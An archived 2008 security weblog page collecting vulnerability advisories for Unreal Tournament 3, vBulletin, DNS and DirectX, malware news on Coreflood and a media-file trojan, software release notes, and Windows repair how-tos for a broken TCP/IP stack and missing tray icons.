Smokey's Security Weblog

veritas odium parit

Highly Critical Vulnerabilities Reported in Unreal Tournament 3

Secunia, a vulnerability intelligence provider, reported today two highly critical vulnerabilities in Unreal Tournament 3 versions 1.2 and 1.3beta4. The vulnerabilities were discovered by Luigi Auriemma.

Vulnerability 1: a problem in the handling of a specific type of packet. In this particular type of packet there is a 16 bit field which specifies the size of the data that follows and if this string is longer than about 172 bytes a memory corruption will occur allowing an attacker to control various registers which could allow the execution of malicious code.

Successful exploitation may allow execution of arbitrary code.

Vulnerability 2: if the amount of data about talked previously is bigger than the total size of the packet the string will not be read and a NULL pointer exception will occur. This type of bug is easily recognizable on the server because the message “Error: Attempted to multiply free a voice packet” is displayed before the crash when the malformed packet is received.

Both vulnerabilities are unpatched, therefore use UT3 in trusted network environments only.

Advertisements

July 31, 2008 Posted by | Advisories, Alerts, Malware, Recommended External Security Related Links, Vulnerabilities | , , , , , , | 1 Comment

DNS Exploit Means Quick Patches Are Critical: patch immediately!

IOActive’s Dan Kaminsky discovered a flaw in the Internet’s Domain Name System (DNS) software, and with the attack code leaked by developers of the Metasploit hacking toolkit, security experts are saying that everything that uses DNS — from desktop PCs to mainframes — needs to be patched immediately, or network security is at risk.

Researchers have released software that exploits the recently leaked flaw in the Internet’s Domain Name System (DNS) software. That may mean IT admins are in for a long weekend of implementing and testing the patch.
IOActive researcher Dan Kaminsky discovered the bug earlier this month. The attack code was released Wednesday by developers of the Metasploit hacking toolkit, headed by the infamous HD Moore.

By exploiting this vulnerability, an attacker can redirect an ISP’s users to a malicious phishing server every time they try to visit a legitimate Web site. The patches released through various vendors should protect from the threat, but it may be a rush for some.

Andrew Storms, director of security for nCircle: “everything that uses DNS needs to be patched; desktop PCs, servers, routers, switches, firewalls and mainframes, and every vendor [like] Cisco, Sun, Microsoft and Apple,” he said. “Basically, this patch impacts the entire network from soup to nuts.”

Source: NEWSFACTOR.com

July 27, 2008 Posted by | Advisories, Alerts, Malware, News, Recommended External Security Related Links, Vulnerabilities | , , , , , , , , , , | 1 Comment

Researchers Raise Alarm Over New Iteration of Coreflood Botnet

The seven-year-old Coreflood botnet is quietly stealing thousands of passwords from corporate users and other large organizations, thanks to recent enhancements that allow it to spread like a worm, researchers say.
In a nutshell, Coreflood has combined its old ability to deliver a password-stealing Trojan with a new ability to infect whole Windows domains in a matter of hours.

“This is potentially way more malicious than Storm, because it is collecting passwords — rather than just sending out spam or denying service — and because the user doesn’t have to click on a link or do anything at all in order to be infected,” says David Jevans, CEO of security vendor IronKey and chairman of the Anti-Phishing Working Group.

Coreflood, which started out as a simple Trojan in late 2001, has been reiterated more than 100 times during its long lifespan. But with the enhancements, the Trojan now has the ability to infect Windows administrators’ machines and then use their privileges to infect all of the other machines in the administrator’s domain.

“We’ve literally seen situations where there was only one machine infected, and within a few hours, 30,000 other machines on the same network were also infected,” Jevans says. “And these aren’t random infections — if it gets through to one administrator’s machine, then all of the devices in his domain will be infected.”

Source/full article: Tim Wilson/DarkReading

July 26, 2008 Posted by | Advisories, Alerts, Malware, Recommended External Security Related Links, Vulnerabilities | , , , , , , , , | Leave a comment

How to recover a really dead Windows XP (SP2/SP3) TCP/IP stack

About this article

Author/source: Hublerb – Tech Support Guy

– Complete destruction and restoration of dead TCP/IP stack
– Recovery from fatal failure or partial or complete corruption of TCP/IP

Related error messages / occurances

– IP Driver Error Code 2.
– TCP/IP network transport is not installed error message from active sync.
– TCP/IP driver missing from devmgmt.msc showing hidden devices.
– Ipconfig produces immediate failure message.
– An Internal error occured: The request is not supported.
– Unable to query host name.
– The specified device instance handle does not correspond to a present device message regarding DHCP service in services.msc
– Net start tcpip >>> fails with system error 2, The system cannot find the file specified.
– Ping error: Unable to contact IP driver, error code 2.
– Repair Local Area Connection: Failed to query TCP/IP settings of the connection. Cannot proceed.
-TCP/IP Protocol Driver Service Failed To Start, system cannot find the file specified.
– The TCP/IP Protocol Driver service failed to start due to the following error:The system cannot find the file specified.

Failed repair methods

– Netsh int ip reset resetlog.txt >>> no effect
– Non-full reinstall of TCP/IP using only the have disk method. >>> no effect
– Netsh Winsock reset >>> no effect
– Winsockxpfix >>> no effect
– Reinstalling network card >>> no effect

Solutions

Repair install

1. Insert and boot from your WindowsXP CD
2. At the second R=Repair option, press the R key
3. This will start the repair
4. Press F8 for I Agree at the Licensing Agreement
5. Press R when the directory where WindowsXP is installed is shown. Typically this is C:\WINDOWS
6. It will then check the C: drive and start copying files
7. It will automatically reboot when needed. Keep the CD in the drive.
8. You will then see the graphic part of the repair that is like during a normal install of XP (Collecting Information, Dynamic Update, Preparing Installation, Installing Windows, Finalizing Installation)
9. When prompted, click on the Next button
10. When prompted, enter your XP key
11. Normally you will want to keep the same Workgroup or Domain name
12. The computer will reboot
13. Then you will have the same screens as a normal XP Install
14. Activate if you want (usually a good idea)
15. Register if you want (but not necessary)
16. Finish

Hardcore method when nothing else is working

Step #1

1. Locate the Nettcpip.inf file in %winroot%\inf, and then open the file in Notepad.
2. Locate the [MS_TCPIP.PrimaryInstall] section.
3. Edit the Characteristics = 0xa0 entry and replace 0xa0 with 0x80.
4. Save the file, and then exit Notepad.
5. In Control Panel, double-click Network Connections, right-click Local Area Connection, and then select Properties.
6. On the General tab, click Install, select Protocol, and then click Add.
7. In the Select Network Protocols window, click Have Disk.
8. In the Copy manufacturer’s files from: text box, type c:\windows\inf, and then click OK.
9. Select Internet Protocol (TCP/IP), and then click OK.
Note This step will return you to the Local Area Connection Properties screen, but now the Uninstall button is available.
10. Select Internet Protocol (TCP/IP), click Uninstall, and then click Yes.
11. Restart

Succesfull uninstallation of TCP/IP will remove numerous keys from the registry including:

HKLM/system/CurrentControlSet/services/tcpip
HKLM/system/CurrentControlSet/services/dhcp
HKLM/system/CurrentControlSet/services/dnscache
HKLM/system/CurrentControlSet/services/ipsec
HKLM/system/CurrentControlSet/services/policyagent
HKLM/system/CurrentControlSet/services/atmarpc
HKLM/system/CurrentControlSet/services/nla

These represent various interconnected and interdependant services.

For good measure you should delete the following keys before reinstalling TCP/IP in step #2:

HKLM/system/CurrentControlSet/services/winsock
HKLM/system/CurrentControlSet/services/winsock2

Step #2

Reinstall of TCP/IP

Following the above substep #3, replace the 0x80 back to 0xa0, this will eliminate the related “unsigned driver” error that was encountered during the uninstallation phase.

Return to “local area connection”> properties > general tab > install > Protocol > TCP/IP

You may receive an “Extended Error” failure upon trying to reinstall the TCP/IP, this is related to the installer sub-system conflicting with the security database status.

To check the integrity of the security database
esentutl /g c:\windows\security\Database\secedit.sdb

There may be a message saying database is out of date
First try the recovery option
esentutl /r c:\windows\security\Database\secedit.sdb

If this don’t work for you, you needthe repair option
esentutl /p c:\windows\security\Database\secedit.sdb

Rerun the /g option to ensure that integrity is good and database is up to date.

Now return to the “local area network setup”
Choose install > protocol > TCP/IP and try again

Reboot.

Author / Source: Hublerb – Tech Support Guy

July 20, 2008 Posted by | Advisories, Friends, Uncategorized | , , , , , , , , , , , , , , , , , , , , , , , | 86 Comments

New kind of malicious software could pose a danger to Windows users who download music files on peer-to-peer networks

A new kind of malicious software could pose a danger to Windows users who download music files on peer-to-peer networks.

The new malware inserts links to dangerous Web pages within ASF (Advanced Systems Format) media files.

“The possibility of this has been known for a little while but this is the first time we’ve seen it done,” said David Emm, senior technology consultant for security vendor Kaspersky Lab.

If a user plays an infected music file, it will launch Internet Explorer and load a malicious Web page which asks the user to download a codec, a well-known trick to get someone to download malware.

The actual download is not a codec but a Trojan horse, which installs a proxy program on the PC, Emm said. The proxy program allows hackers to route other traffic through the compromised PC, helping the hacker essentially cover their tracks for other malicious activity, Emm said.

The malware has worm-like qualities. Once on a PC, it looks for MP3 or MP2 audio files, transcodes them to Microsoft’s Windows Media Audio format, wraps them in an ASF container and adds links to further copies of the malware, in the guise of a codec, according to another security analyst, Secure Computing.

The “.mp3” extension of the files is not modified, however, so victims may not immediately notice the change, according to Kaspersky Lab.

“Users downloading from P2P networks need to exercise caution anyway, but should also be sensitive to pop-ups appearing upon playing a downloaded video or audio stream,” Secure Computing said.

Trend Micro calls the malware “Troj_Medpinch.a,” Secure Computing named it ” “Trojan.ASF.Hijacker.gen” and Kaspersky calls it “Worm.Win32.GetCodec.a.”

Source / full article: PCWorld Business Center

July 18, 2008 Posted by | Advisories, Alerts, Downloads, Malware, News, Recommended External Security Related Links | , , , , , , , , , , , , , , , , | Leave a comment

Microsoft Security Bulletin MS08-033 (Critical): Vulnerabilities in DirectX Could Allow Remote Code Execution (951698)

Published: June 10, 2008 | Updated: July 16, 2008

This security update resolves two privately reported vulnerabilities in Microsoft DirectX that could allow remote code execution if a user opens a specially crafted media file. An attacker who successfully exploited either of these vulnerabilities could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.

This security update is rated Critical for all supported editions of Microsoft Windows 2000, Windows XP, Windows Server 2003, Windows Vista, and Windows Server 2008.

The security update addresses the vulnerability by modifying the way that DirectX handles MJPEG and SAMI format files.

Microsoft recommends that customers apply the update immediately.

Source / full article / download: Microsoft TechNet

July 18, 2008 Posted by | Advisories, Alerts, Downloads, Malware, Recommended External Security Related Links, Vulnerabilities | , , , , , , , , , , , | Leave a comment

heise SSL Guardian: protection against unsafe SSL certificates

Https connections are often used to transfer important data, such as passwords, PINs, or credit card numbers. The browser ensures that the sender can be identified with a valid certificate and that the transferred data are encrypted. An error in the Debian Linux distribution has generated numerous certificates that are child’s play to crack. Many servers still use these weak certificates, even though it is impossible to establish a secure connection using them. The heise SSL Guardian checks the SSL certificates and warns you when it detects a weak one.

All Windows applications that use Windows CryptoAPI will be protected by SSL Guardian. This includes Internet Explorer and Outlook Express, as well as Windows Mail. However, SSL Guardian does not protect Firefox and Opera as these use their own crypto libraries and not CryptoAPI. In order to protect Firefox, the Firefox SSL Blacklist extension is needed, as this has a similar function.

The Guardian support Windows 2000, XP and Vista Operating Systems and is free.
There are two versions with different sized lists. The first is for users that have adequate bandwidth and time. The second is a third as large, but still detects more than 98% of the weak certificates.

More info and download: heise Security

July 12, 2008 Posted by | Advisories, Downloads, Friends, News, Recommended External Security Related Links, Vulnerabilities | , , , , , , , , | Leave a comment

F-Secure Client Security Version 7.12 Released

This service release fixes issues from the previous version of the product. For details, please see the Release Notes.

What is new in 7.1x release:

-Windows Vista support
-F-Secure Client Security 7.1x supports Windows Vista 32-bit versions.
-Improved real-time scanning performance on removable drives
-Enhanced logic of scanning to enable faster scanning for large files that reside on removable drives.
-Updated scanning report to elaborate what happens
-Scanning report has been updated to explain in more detail why certain files have been skipped.
-Faster spyware removal
-Spyware removal is significantly faster with this release. While previously the spyware scan was reinitiated with removal, now the scanning maintains information about its state.
-Reduced memory consumption
-The product has now been optimized to use less memory. There is a significant decrease in the amount of memory consumed. This shows as improved overall performance.
-Internet Shield IPv6 support
-IPv6 support in Internet Shield is now two-fold: the minimal Internet Protocol version 6 support enables user to block all IPv6 traffic if needed. This has been extended with ability to create firewall rules and handle IPv6 alerts in application control for IPv6 addresses. This extension is limited to Vista only, while the minimal support is available on all supported platforms.
-Updated identification and removal of conflicting programs (sidegrade)
-Sidegrade has been updated to include more common conflicting products, and cleaned from the unnecessary removals that would not cause conflict with our software.
-New manual database installation tool
-A new tool for updating protection databases manually, called fsdbupdate, installs all the latest database updates for customers with a valid subscription.
-Improved System Control with DeepGuard for latest malware types
-System Control with DeepGuard has been updated to protect from the very latest types of malware attacks.
-Remote Application List for System Control
-Administrator can configure System Control to deny or allow applications remotely with Policy Manager.
-Includes all previous hotfixes

This release is for the following operating systems:

-Windows Vista 32-bit, SP1
-Windows XP Home Edition with SP0 /SP1 / SP2 /SP3
-Windows XP Professional Edition with SP0 /SP1 / SP2 /SP3
-Windows XP Media Center Edition with SP1
-Windows 2000 Workstation with SP4 Rollup 1 or higher

Note: when F-Secure Client Security 7.1x is taken into use, F-Secure Policy Manager needs to be version 7.1x or later.

Product home page: F-Secure

July 12, 2008 Posted by | Advisories, Alerts, Downloads, Friends, News, Recommended External Security Related Links | , , , , , , , , , | Leave a comment

Highly critical vulnerabilities reported in vBulletin

Some highly critical vulnerabilities have been reported in vBulletin, which can be exploited by malicious people to conduct script insertion attacks.

Input passed via “PHP_SELF” or via the “do” parameter when requesting a missing page is not properly sanitised before being logged. This can be exploited to insert arbitrary HTML and script code, which is executed in an administrator’s browser session in context of an affected site when the malicious logs are being viewed.

Reportedly, the vulnerabilities can be exploited to inject and execute arbitrary PHP code on an affected system.

It affect version 3.7.2 and 3.6.10 PL2. Prior versions may also be affected.

Solution: update to version 3.7.2 PL1 or 3.6.10 PL3.

Sources: Secunia and vBulletin.

July 12, 2008 Posted by | Advisories, Alerts, Downloads, Malware, Recommended External Security Related Links, Vulnerabilities | , , , , , , , | 1 Comment

Smokey’s Security Forums down past 2 days

Past 2 days Smokey’s Security Forums was down, cause: an unsual and fully unexpected combination of happenings all at the same time, lastly solved past morning.

My apologises for the inconvenience.

Smokey

July 11, 2008 Posted by | Friends, News, Recommended External Security Related Links | , , | Leave a comment

Apple updates Leopard to 10.5.4

Apple has released Mac OS X 10.5.4, the fourth update to Leopard since it was released last October.

The new version contains the usual mix of bug fixes and security updates, with iCal getting the most attention. iCal won’t delete events without telling you as a result of the latest update, for example, and Apple said the update “improves overall iCal reliability.” Airport and Spaces & Expose also received some updates.

There are also a couple of security-related fixes for Safari and other issues.

Source: Crave
Download: Apple Downloads

July 6, 2008 Posted by | Advisories, Alerts, Downloads, Friends, News, Recommended External Security Related Links, Vulnerabilities | , , , , , , , , | Leave a comment

Microsoft Security Bulletin Advance Notification for July 2008

Published: July 3, 2008

Microsoft Security Bulletin Advance Notification issued: July 3, 2008
Microsoft Security Bulletins to be issued: July 8, 2008

This is an advance notification of security bulletins that Microsoft is intending to release on July 8, 2008.
This bulletin advance notification will be replaced with the July bulletin summary on July 8, 2008.

Executive Summaries

Important (4)

Bulletin Identifier: SQL Bulletin
Impact of Vulnerability: Elevation of Privilege
The update may require a restart.
Affected Software: Microsoft Windows, Microsoft SQL Server. For more information, see the Affected Software section.

Bulletin Identifier: Windows Bulletin 1
Impact of Vulnerability: Remote Code Execution
Affected Software: Microsoft Windows. For more information, see the Affected Software section.

Bulletin Identifier: Windows Bulletin 2
Impact of Vulnerability: Spoofing
The update requires a restart.
Affected Software: Microsoft Windows. For more information, see the Affected Software section.

Bulletin Identifier: Exchange Server Bulletin
Impact of Vulnerability: Elevation of Privilege
The update may require a restart.
Affected Software: Microsoft Exchange Server. For more information, see the Affected Software section.

Non-Security, High-Priority Updates on MU, WU, and WSUS

For information about non-security releases on Windows Update and Microsoft update, please see:

Microsoft Knowledge Base Article 894199: Description of Software Update Services and Windows Server Update Services changes in content for 2008. Includes all Windows content.

New, Revised, and Released Updates for Microsoft Products Other Than Microsoft Windows.

Disclaimer

The information provided in the Microsoft Knowledge Base is provided “as is” without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.

Source / Full Bulletin: Microsoft TechNet

July 5, 2008 Posted by | Advisories, Alerts, Downloads, Friends, Malware, News, Recommended External Security Related Links, Vulnerabilities | , , , , , , | 1 Comment

Windows Vista Disappearing System Tray Icons Quick Fix

How-to for fixing missing icons in the Windows Vista system tray:

1. Back up the Registry by creating a restore point.
2. Go to Start > Run (or Windows-key + “R”), type in “regedit” and hit “OK”.
3. Navigate to the key “HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion \TrayNotify”.
4. Delete the values “IconStreams” and “PastIconsStream”.
5. Open up the Task Manager (Ctrl + Shift + Esc), go to the “Processes” tab, select “explorer.exe” and click “End Process”.
6. Open the “Applications” tab and click “New Task…” at the bottom-right of the window.
7. In the message box that pops up type in “explorer.exe” and hit “OK”.
8. Explorer.exe will reload, and the missing icons should now be back in the system-tray where they belong.

Enjoy yourself! 😉

July 5, 2008 Posted by | Advisories, Downloads, Friends, Uncategorized | , , , , , , , , | 38 Comments

Opera 9.51 Released (Recommended security and stability upgrade)

-July 3, 2008: Opera 9.51 released, this is a recommended security and stability upgrade. Several highly critical vulnerabilty issues were present in all previous versions, we recommend you upgrade asap!

Changes since Opera 9.5

User Interface

– Fine-tuned the new Opera skin.
– Improved drag/drop of tabs.
– Fixed problems with search engines when upgrading from Opera 9.2x.
– Fixed a stability issue when printing or when in print preview.
– Added an option to toggle mouse flips in opera:config (User Prefs – Enable Mouse Flips).
– Textarea inputs now clear when no-cache is set.
– Saving of images is no longer recorded in transfers.

Mail/News

– Feeds now show the first time when you subscribe.
– Corrected a stability issue that could occur when clicking the drop-down to switch views.
– Adjusted thread expanding in Mail when receiving new messages.
– Corrected a problem where multiple views (access points) show for the same account.

Display and Scripting

– Corrected a stability issue with User JS.
– Style sheets now load when navigating in history.
– window.close() now functions after invoking a context menu and when closing Opera Dragonfly.

Security

– Fixed an issue where < canvas > functions could reveal data from random places in memory, as reported by Philip Taylor. See the advisory.
– Fixed an issue that could be used to execute arbitrary code, as reported by Billy Rios. Details will be disclosed at a later date.
– Security status is now correctly set when navigating from HTTP to HTTPS.
– Corrected an issue related to OCSP and CRLs that would lower security.
— Note: This will take effect with the weekly update, or when checking manually for an update (Help > Check for Updates).

Miscellaneous

– Corrected a stability issue with Yahoo! Mail.
– TinyMCE 2.1.x editor now works properly.
– Printing of chat items has been improved.
– Reconnection of the IRC client has been adjusted and improved.
– Menus on deviantart.com now work properly.
– Eliminated unwanted line breaks in rich text editors.

Windows-specific changes

– Fixed a resource leak in the transfer window that could cause visual paint problems and other related problems.
– Command line parameters must now be specified before any URLs on the command line.

Source: Opera Software
Download Opera v9.51: Opera Software Download Section

July 5, 2008 Posted by | Advisories, Alerts, Downloads, Friends, News, Recommended External Security Related Links, Vulnerabilities | , , , , , | Leave a comment